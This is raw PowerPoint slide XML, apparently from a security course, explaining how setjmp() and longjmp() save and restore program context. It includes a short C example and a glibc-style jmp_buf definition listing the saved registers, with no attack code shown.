        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11912874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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Overwritten: Long Jumps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097733" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() are used to perform non-local, inter-procedural direct control transfer from one point in a program to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” that restores the program state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call saves the context of a program in a data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When used to save the environment, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) returns 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call restores the context of the program to its original state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is called, it is as if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) returned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This mechanism can be used to perform exception/error handling and to implement user-space threading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7723570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83" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099784" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) != 0)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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = %d\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = %d\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    f1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099785" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>void f2(jmp_buf e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (check == error) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    longjmp(e, ERROR2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    /* unreachable */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>void f1(jmp_buf e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (check == error) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    longjmp(e, ERROR1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    /* unreachable */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    f2(e);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16769260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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>jmp_buf Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101829" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>typedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[6];</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a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_BX  0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_SI  1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_DI  2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_BP  3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_SP  4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_PC  5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t># define JB_SIZE 24</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a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/* Calling environment, plus possibly a saved signal mask.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>typedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmp_buf_tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;      /* Calling environment.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mask_was_saved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;    /* Saved the signal mask? */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sigset_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>saved_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; /* Saved signal mask.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
